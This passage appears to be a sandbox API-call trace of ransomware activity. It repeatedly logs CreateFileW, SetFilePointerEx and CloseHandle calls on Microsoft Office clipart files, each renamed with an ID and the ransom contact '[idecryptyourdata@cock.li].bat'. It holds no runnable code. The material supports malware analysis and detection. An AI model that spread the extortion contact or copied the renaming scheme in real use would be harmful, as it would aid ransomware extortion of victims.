dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.720] CloseHandle (hObject=0x414) returned 1 [0171.721] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.721] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00723_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00723_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.721] CloseHandle (hObject=0x414) returned 1 [0171.722] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.722] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00726_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00726_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.722] CloseHandle (hObject=0x414) returned 1 [0171.723] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.723] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00737_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00737_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.723] CloseHandle (hObject=0x414) returned 1 [0171.724] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.724] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00833_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00833_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.724] CloseHandle (hObject=0x414) returned 1 [0171.725] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.725] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00898_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00898_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.725] CloseHandle (hObject=0x414) returned 1 [0171.726] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.726] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.726] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00934_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00934_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.727] CloseHandle (hObject=0x414) returned 1 [0171.727] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.727] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00998_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00998_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.727] CloseHandle (hObject=0x414) returned 1 [0171.728] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.728] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0171.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01160_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01160_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.729] CloseHandle (hObject=0x414) returned 1 [0172.327] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.327] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.327] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01172_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01172_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.328] CloseHandle (hObject=0x484) returned 1 [0172.328] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.328] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05710_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05710_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.329] CloseHandle (hObject=0x484) returned 1 [0172.330] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.330] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05869_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05869_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.330] CloseHandle (hObject=0x484) returned 1 [0172.331] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.331] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.331] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05870_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05870_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.331] CloseHandle (hObject=0x484) returned 1 [0172.332] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.332] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.332] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05930_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05930_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.332] CloseHandle (hObject=0x484) returned 1 [0172.333] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.333] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06049_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe06049_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.334] CloseHandle (hObject=0x484) returned 1 [0172.334] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.334] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06450_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe06450_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.335] CloseHandle (hObject=0x484) returned 1 [0172.335] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.335] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00601G.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph00601g.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.336] CloseHandle (hObject=0x484) returned 1 [0172.336] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.336] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.336] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00780U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph00780u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.336] CloseHandle (hObject=0x484) returned 1 [0172.339] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.339] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01035U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01035u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.339] CloseHandle (hObject=0x42c) returned 1 [0172.345] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.345] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.345] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01179J.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01179j.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.345] CloseHandle (hObject=0x484) returned 1 [0172.357] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.357] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01213K.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01213k.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.357] CloseHandle (hObject=0x484) returned 1 [0172.358] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.359] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01221K.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01221k.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.359] CloseHandle (hObject=0x484) returned 1 [0172.360] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.360] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01235U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01235u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.360] CloseHandle (hObject=0x484) returned 1 [0172.361] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.361] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01236U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01236u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.361] CloseHandle (hObject=0x484) returned 1 [0172.362] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.362] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01239K.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01239k.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.362] CloseHandle (hObject=0x484) returned 1 [0172.363] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.364] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.364] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01247U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01247u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.364] CloseHandle (hObject=0x484) returned 1 [0172.365] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.365] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.365] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01255G.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01255g.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.365] CloseHandle (hObject=0x484) returned 1 [0172.367] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.367] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01265U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01265u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.367] CloseHandle (hObject=0x484) returned 1 [0172.369] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.369] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01332U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01332u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.369] CloseHandle (hObject=0x484) returned 1 [0172.371] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.371] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01478U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01478u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.371] CloseHandle (hObject=0x42c) returned 1 [0172.373] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.373] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01562U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01562u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.373] CloseHandle (hObject=0x42c) returned 1 [0172.374] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.374] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01607U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01607u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.375] CloseHandle (hObject=0x42c) returned 1 [0172.486] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.486] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0172.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01931J.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01931j.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 